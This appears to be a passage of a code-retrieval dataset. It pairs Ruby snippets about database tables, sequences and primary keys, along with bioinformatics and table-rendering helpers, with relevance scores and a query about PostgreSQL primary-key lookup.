record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def collect\r\n array = []\r\n @table.each do |subarray|\r\n array.concat subarray\r\n end\r\n array\r\n end",
"def make_sequence\n 4.times do\n self.sequence << COLORS.sample\n end\n end",
"def init_table(data=[], options={})\n # TODO : create data array from the df and vector data. So that\n # we can directly use the array.(No need to create df or vector and\n # generate the html table using to_html)\n if data.is_a?(Array)\n data_name = 'series_data'+ SecureRandom.uuid\n data =\n if data.all? { |e| e.class==Array }\n Daru::DataFrame.rows(data, name: data_name)\n else\n Daru::Vector.new(data, name: data_name)\n end\n end\n # options[:data] = data_in_array unless data_in_array.empty?\n @table = Daru::DataTables::DataTable.new(options)\n @data = data\n @table\n end",
"def sequencePrimaries(synsets)\n #\n #A synset's \"primaries\" are those words/phrases in the set; i.e., its collection of synonyms\n #Those synsets (via parameterization) whose synset_t2_map(s) indicates its primaries have\n #not yet been sequenced are done so here. \n #\n progress=0\n synsets.each do |synset|\n unless (synsetmaps=SynsetT2Map.find_all_by_synset_id(synset.synsetid))==[]\n synsetmaps.each do |synmap|\n######Console progress indicator################## \n progress=progress+1\n if progress%9==0\n print '.'\n if progress%100==0\n print \"+\\n\"\n end\n end\n##################################################\n unless ((synmap.th_sequence_id==nil) || \n (synmap.primaries_sequenced) || \n (synmap.th_phrase_definition_id==nil))\n #Add this phrase/definition pair as a ThMember of sequence.\n th_member = ThMember.create(:th_sequence_id => synmap.th_sequence_id,\n :th_phrase_definition_id => synmap.th_phrase_definition_id,\n :ordinality => PRIMARY_ORD,\n :th_mod_info_id => MyDModInfo.id)\n #Set the flag to indicate that the primary word/phrase for this phrase/definition pair\n #has been added as member to the sequence.\n synmap.update_attribute(:primaries_sequenced, TRUE)\n end\n end\n end\n end\n end",
"def columns\n orig_dataset.columns\n end",
"def index\n @tariffs = Tariff.all\n\n connection = ActiveRecord::Base.connection\n quantitative = []\n categorical = []\n values = []\n Tariff.first.properties.each do |k,v|\n if v.is_a? String\n r1 = connection.select_all(\"SELECT properties->>'\" + k + \"' AS property FROM tariffs\").rows\n categorical << r1 if r1.uniq.length > 1\n else\n r2 = connection.select_all(\"SELECT properties->>'\" + k + \"' AS property FROM tariffs\").rows.flatten\n values << r2.collect{|s| s.to_i}\n quantitative << k\n end\n end\n\n temp = categorical.flatten.uniq\n rows = sequence(temp.length)\n\n @header = temp # | quantitative\n @rows = rows # | values\n\n # @test = values\n\n #data_set = Daru::DataFrame.from_csv \"logistic_mle.csv\"\n #glm = Statsample::GLM.compute data_set, :y, :logistic, {constant: 1, algorithm: :mle}\n\n # Options hash specifying addition of an extra constants\n # vector all of whose values is '1' and also specifying\n # that the MLE algorithm is to be used.\n\n #@test = glm.coefficients\n #=> [0.3270, 0.8147, -0.4031,-5.3658]\n #puts glm.standard_error\n #=> [0.4390, 0.4270, 0.3819,1.9045]\n #puts glm.log_likelihood\n\n\n #p sequence(3) #=>[[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]]\n end",
"def subject_ids\n self.get_civet_outputs.map(&:dsid)\n end",
"def table_to_array_of_arrays(table=@table)\n array = []\n table.rows.each do |row|\n row_array = []\n row.data.each_with_index do |column, index|\n data = {:text => column}\n if row.cell_format.is_a? Hash\n data.reverse_merge! row.cell_format\n elsif row.cell_format.is_a? Array\n data.reverse_merge! row.cell_format[index]\n end\n row_array << Prawn::Table::Cell.new(data)\n end\n array << row_array\n end\n array\n end",
"def ndata; end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def query_to; @seq1.to; end",
"def sen_settg(row,column); det.table(:index, 12)[row][column]; end",
"def get_table_set\n P2::Application.reset CLIENT_INI\n @conn = P2::Connection.new :app_name => 'RecordTest',\n :host => \"127.0.0.1\", :port => 4001\n @conn.Connect\n\n @ds = P2::DataStream.new :stream_name => 'RTS_INDEX_REPL',\n :type => P2::RT_COMBINED_DYNAMIC\n\n @ds.Open(@conn)\n\n @ds.events.on_event { |*args| p args }\n 2.times { @conn.ProcessMessage2(1000) } # Push @ds to receive its TableSet\nend",
"def to_array(dataset)\n dataset.map do |row|\n entity_class.new row\n end\n end",
"def train_set\n data_input = data_output = @data_input\n data_input.delete_at(data_input.index(data_input.last))\n data_output.delete_at(data_output.index(data_output.first))\n RubyFann::TrainData.new(inputs: data_input,\n desired_outputs: data_output)\n end",
"def sequence_hunter(head)\n\tarr_arrs = []\n\t\n\tarr_values = []\n\tarr_values.push(node.value)\n\n\t#nope, giving up after an hour\n\t#basically we need to generate an array of each level\n\t#but good fucking luck\nend",
"def to_tsvectors\n []\n end",
"def query_from; @seq1.from; end",
"def get_valid_model_table(table)\n new_table = []\n unless table.empty?\n length_table = table.size\n (0..length_table - 1).each do |row_index|\n cells_added = 0\n original_row = [].concat(table[row_index])\n new_table[row_index] = [] if new_table.size <= row_index\n length_row = original_row.size\n (0..length_row - 1).each do |cell_index|\n cell = original_row[cell_index]\n new_cell_index = cell_index + cells_added\n new_row = new_table[row_index]\n until new_row[new_cell_index].nil?\n cells_added += 1\n new_cell_index = cell_index + cells_added\n end\n new_row[new_cell_index] = cell\n\n next unless cell.has_attribute?('rowspan')\n\n rowspan = cell.get_attribute('rowspan').to_i\n\n next unless rowspan > 1\n\n (1..rowspan - 1).each do |rowspan_index|\n new_row_index = row_index + rowspan_index\n new_table[new_row_index] = [] if new_table[new_row_index].nil?\n new_table[new_row_index][new_cell_index] = cell\n end\n end\n end\n end\n new_table\n end",
"def my_transpose\n\n end",
"def sampling_data(fun, v1=vv1, v2=vv2, repeat1=30, plan=NULL)\n len = v1.length\n data1 = Array.new(len, 0)\n len.times {|factor1|\n data1[factor1] = make_data_set(fun, v1, v2, factor1, repeat1, plan)\n }\n\n print \"sampling_data data is \\n\"\n p data1\n\n data1\nend",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def table_entry\n unless defined? @table_entry\n table = Disassembler.class_variable_get(\"@@decoding_table\")\n @table_entry = table_entry_helper(table, :opcode).select do |(_,instr)|\n (@raw & ~instr.mask) == 0\n end.sort do |(_,instr1),(_,instr2)|\n instr1.operands.length <=> instr2.operands.length\n end.first\n end\n @table_entry\n end",
"def get_table_data(data, key)\n raw_data = []\n table_data = []\n index = 0\n k0 = 0\n data[key].sort_by{\n # Sort the table by the identifiers (e.g. Microarchitecture, or Microarchitecture + CPU name).\n # This colum is either just a text field, or a more complex hash with a :sort key that should be\n # used for sorting.\n |k, _v| k.map { |c| c.kind_of?(Hash) ? c[:sort] : c }\n }.to_h.each { |k, v|\n k0 = k if index == 0\n index += 1\n elts = v.sort.to_h.values\n raw_data << elts\n table_data << k.map{ |e| e.kind_of?(Hash) ? \"data-sort-value=\\\"#{e[:sort]}\\\"|#{e[:text]}\" : \"data-sort-value=\\\"#{index.to_s.rjust(3, '0')}\\\"|#{e}\" } +\n elts.map{ |e| e.kind_of?(Hash) ? \"data-sort-value=\\\"#{e[:sort]}\\\"|#{e[:text]}\" : e }\n .map{ |e| e == 0 ? '' : e } + [\"'''#{elts.reduce(:+)}'''\"]\n }\n elts = raw_data.transpose.map{ |e| e.reduce(:+)}\n table_data << {columns: [\"'''Sites total'''\"] +\n [' '] * (k0.length - 1) +\n (elts + [elts.reduce(:+)]).map{ |e| e == 0 ? '' : \"'''#{e}'''\" },\n sort: false}\n end",
"def omim_ids\n @table.keys\n end",
"def next_serial_number\n serial = permute(permute(@offset % BOUNDARY))\n @offset += STEP\n serial\n end",
"def dataset\n @@dataset\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def assign_starts_of_streams_to_sets(sets,hw)\n stream_labels = []\n stream_starts_at_set = 1\n hw.each { |stream|\n stream_starts_at_set = stream_starts_at_set+stream[\"delay\"].to_i\n if stream_labels[stream_starts_at_set].nil? then\n stream_labels[stream_starts_at_set]=stream[\"stream\"]\n else\n stream_labels[stream_starts_at_set] = stream_labels[stream_starts_at_set]+';'+stream[\"stream\"]\n end\n }\n 1.upto(sets.length-1) { |set_number|\n if stream_labels[set_number].nil? then stream_labels[set_number]='' end\n #print \"=== #{set_number}->#{stream_labels[set_number]}\\n\"\n }\n return stream_labels\nend",
"def inferDataTypes( dataset, year, filename, tablename, single_point_as_dec, nameEditor )\n file = File.new( filename, 'r' );\n line = 0\n maxvals = []\n n = 0\n topline = []\n CSV.foreach( file, { col_sep:\"\\t\" } ){\n |elements|\n line += 1\n if( line == 1 )then\n topline = elements\n n = topline.length\n n.times{\n |i|\n maxvals[i] = INT\n }\n # elsif line >= 500 then\n # break;\n else\n i = 0\n elements.each{\n |cell|\n colname = nameEditor.edit( topline[i].downcase() )\n if colname =~ /.*sernum.*/i then\n maxvals[i] = SERNUM \n elsif cell =~ /.*\\/.*/ then\n puts \"infering DATE for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], DATE ].max() \n elsif cell =~ /.*[\"'`a-z].*/i then\n maxvals[i] = [ maxvals[i], STRING ].max() \n elsif cell =~ /[0-9]+\\.[0-9]$/ and single_point_as_dec then \n # FIXME exactly one point as decimal XX,1; \n # this is in HSE for industry codes and so on but probably not general\n puts \"infering DECIMAL for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], DECIMAL ].max() \n elsif cell =~ /[0-9]+\\.[0-9]+/ or cell =~/^\\.[0-9]+/ or cell =~ /^[0-9]\\.$/ then\n puts \"infering AMOUNT for #{colname}; cell is |#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], AMOUNT ].max() \n # FIXME should we blow up if remainder not obviously an integer?\n else # int of some kind - check for extreme values\n x = cell.to_f()\n if( x > 2147483647.0 ) or ( x < -2147483648.0 )then # out of postgres integer range\n puts \"inferring SERNUM for #{colname}; cell=|#{cell}|\\n\"\n maxvals[i] = [ maxvals[i], SERNUM ].max() \n end\n end # ignore enums for now\n i += 1\n } \n end\n }\n file.close()\n # connection = getConnection()\n n.times{\n |i|\n if maxvals[i] != INT then # since we default to INT anyway\n colname = nameEditor.edit( topline[i].downcase() )\n puts \"changing #{} to #{maxvals[i]}\\n\"\n puts \"#{maxvals[i]} #{dataset}, #{tablename}, #{year}, #{colname}\\n\"\n updateVarType( maxvals[i], dataset, tablename, year, colname ) \n # statement.execute( maxvals[i], dataset, tablename, year, colname ) \n end\n }\n # connection.disconnect()\nend",
"def initialize\n @table = [] # Array contains Arrays of Strings\n @col = 0\n @row = 0\n @total_time = 0\n @total_records = 0\n # omitting separators for now\n end"
] |
[
"0.60077465",
"0.52115154",
"0.5192342",
"0.5162852",
"0.5099557",
"0.5063107",
"0.50618666",
"0.5042069",
"0.5014444",
"0.5005303",
"0.4981823",
"0.49606812",
"0.49182153",
"0.49182153",
"0.49060225",
"0.489107",
"0.48698348",
"0.48606262",
"0.48503137",
"0.48341665",
"0.4829027",
"0.48264205",
"0.48257035",
"0.4798229",
"0.4790644",
"0.47809544",
"0.4778504",
"0.47769713",
"0.47761568",
"0.47659633",
"0.4757272",
"0.4734346",
"0.47327235",
"0.47256058",
"0.47217754",
"0.47167253",
"0.47123584",
"0.47083256",
"0.470438",
"0.46919522",
"0.4682038",
"0.4672165",
"0.46702176",
"0.46692646",
"0.46640435",
"0.46577635",
"0.4656919",
"0.46504804",
"0.46481657",
"0.46283597",
"0.46182525",
"0.46149868",
"0.46121633",
"0.45934203",
"0.4588267",
"0.45819506",
"0.45819506",
"0.4576637",
"0.45728758",
"0.45575884",
"0.4551869",
"0.45476255",
"0.45406893",
"0.4539524",
"0.45307782",
"0.45282468",
"0.45228568",
"0.45206484",
"0.4518097",
"0.451681",
"0.4514961",
"0.45141825",
"0.45115823",
"0.4502356",
"0.44897228",
"0.448601",
"0.44826058",
"0.44781625",
"0.44673342",
"0.4466061",
"0.4463588",
"0.44576827",
"0.4454149",
"0.44405693",
"0.4437539",
"0.4435667",
"0.44259405",
"0.44251204",
"0.44227958",
"0.44226226",
"0.4422365",
"0.44220814",
"0.44189146",
"0.44111055",
"0.44078547",
"0.44059402",
"0.44056466",
"0.44026318",
"0.44007283",
"0.44003806"
] |
0.6579111
|
0
|
Dataset used to determine primary keys for tables
|
def _select_pk_ds
@_select_pk_ds ||= metadata_dataset.
from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).
where{[
[pg_class[:oid], pg_attribute[:attrelid]],
[pg_class[:relnamespace], pg_namespace[:oid]],
[pg_class[:oid], pg_index[:indrelid]],
[pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],
[pg_index[:indisprimary], 't']
]}.
select{pg_attribute[:attname].as(:pk)}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def primary_key(_table_name)\n []\n end",
"def dataset_need_primary_key?\n true\n end",
"def primary_key_columns\n @columns.values.find_all { |c| c.primary_key? }\n end",
"def dataset_need_primary_key?\n true\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def dataset_need_primary_key?\n false\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def dataset_need_primary_key?\n false\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def primary_keys\n ::Kernel.raise Errors::NotImplemented\n end",
"def dataset_key\n :id\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key\n select(&:primary_key?)\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key_names\n @primary_key_names ||= session.left.primary_key_names(left_table)\n end",
"def key_columns\n @key_columns ||= [\"#{self.table_name}__id\".to_sym]\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key\n fields.select { |f| f.key }.map(&:name)\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_keys\n cached_fetch(:primary_keys){Array(primary_key)}\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def table_primary_keys table_name, include_parent_keys = false\n sql = +\"WITH TABLE_PK_COLS AS ( \"\n sql << \"SELECT C.TABLE_NAME, C.COLUMN_NAME, C.INDEX_NAME, C.COLUMN_ORDERING, C.ORDINAL_POSITION \"\n sql << \"FROM INFORMATION_SCHEMA.INDEX_COLUMNS C \"\n sql << \"WHERE C.INDEX_TYPE = 'PRIMARY_KEY' \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '') \"\n sql << \"SELECT INDEX_NAME, COLUMN_NAME, COLUMN_ORDERING, ORDINAL_POSITION \"\n sql << \"FROM TABLE_PK_COLS \"\n sql << \"INNER JOIN INFORMATION_SCHEMA.TABLES T USING (TABLE_NAME) \"\n sql << \"WHERE TABLE_NAME = %<table_name>s \"\n sql << \"AND TABLE_CATALOG = '' \"\n sql << \"AND TABLE_SCHEMA = '' \"\n unless include_parent_keys\n sql << \"AND (T.PARENT_TABLE_NAME IS NULL OR COLUMN_NAME NOT IN ( \"\n sql << \" SELECT COLUMN_NAME \"\n sql << \" FROM TABLE_PK_COLS \"\n sql << \" WHERE TABLE_NAME = T.PARENT_TABLE_NAME \"\n sql << \")) \"\n end\n sql << \"ORDER BY ORDINAL_POSITION\"\n execute_query(\n sql,\n table_name: table_name\n ).map do |row|\n Index::Column.new \\\n table_name,\n row[\"INDEX_NAME\"],\n row[\"COLUMN_NAME\"],\n order: row[\"COLUMN_ORDERING\"],\n ordinal_position: row[\"ORDINAL_POSITION\"]\n end\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key\n return @primary_key if @primary_key\n return 'id' if @id\n \n candidates = @columns.find_all { |col| col.unique }.map { |col| col.name }\n return 'id' if candidates.include? 'id'\n candidates.find { |c| c =~ eval(\"/^#{@name}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{singularize}.*id$/i\") } ||\n candidates.find { |c| c =~ eval(\"/^#{pluralize}.*id$/i\") } ||\n candidates.first\n end",
"def pk(ta, h)\n x = primary_keys[ta]\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def get_primary_keys \r\n return {\"KtoNr\" => self.KtoNr}\r\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key_names(table_name, options = {})\n return connection.primary_key_names(table_name) if options[:raw]\n \n self.primary_key_names_cache ||= {}\n result = primary_key_names_cache[table_name]\n unless result\n result = manual_primary_keys[table_name] || connection.primary_key_names(table_name)\n primary_key_names_cache[table_name] = result\n end\n result\n end",
"def class_primary_key_fields(klass)\n fields = []\n if klass.primary_key.class == Array || klass.primary_key.class == CompositePrimaryKeys::CompositeKeys\n klass.primary_key.each do |pk|\n fields << [klass.table_name, pk.to_s]\n end\n else\n fields << [klass.table_name, klass.primary_key]\n end\n fields\n end",
"def primary_key(*names)\n names.each do |name|\n attributes[name][:type] = attributes[name][:type].meta(primary_key: true)\n end\n self\n end",
"def primary_key_lookup(pk)\n if sql = @fast_pk_lookup_sql\n sql = sql.dup\n ds = dataset\n ds.literal_append(sql, pk)\n ds.fetch_rows(sql){|r| return ds.row_proc.call(r)}\n nil\n elsif dataset.joined_dataset?\n # SEQUEL5: Remove as joined model datasets are not allowed\n dataset.first(qualified_primary_key_hash(pk))\n else\n dataset.first(primary_key_hash(pk))\n end\n end",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def get_pkey_fields(table_struct)\n pkeys = []\n\n table_struct.each do | row |\n pkeys << row[:field] if row[:key] == 'PRI'\n end\n\n pkeys\nend",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def primary_key\n 'id'\n end",
"def primary_key_lookup(pk)\n if sql = @fast_pk_lookup_sql\n sql = sql.dup\n ds = dataset\n ds.literal_append(sql, pk)\n ds.fetch_rows(sql){|r| return ds.row_proc.call(r)}\n nil\n else\n dataset.first(primary_key_hash(pk))\n end\n end",
"def primary_key(*names)\n names.each do |name|\n attributes[name] = attributes[name].meta(primary_key: true)\n end\n self\n end",
"def extract_key(row)\n row.reject {|column, value| not primary_key_names.include? column }\n end",
"def primary_key\n fail NotImplementedError\n end",
"def key(*fields)\n @primary_key = fields\n before_save :generate_key\n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_key\n self[:primary_key]\n end",
"def omim_ids\n @table.keys\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def key_columns(records)\n raise 'Cannot determine key from empty batch' if records.empty?\n\n first_key = records.first.key\n record_key(first_key).keys\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key\n '_id'\n end",
"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
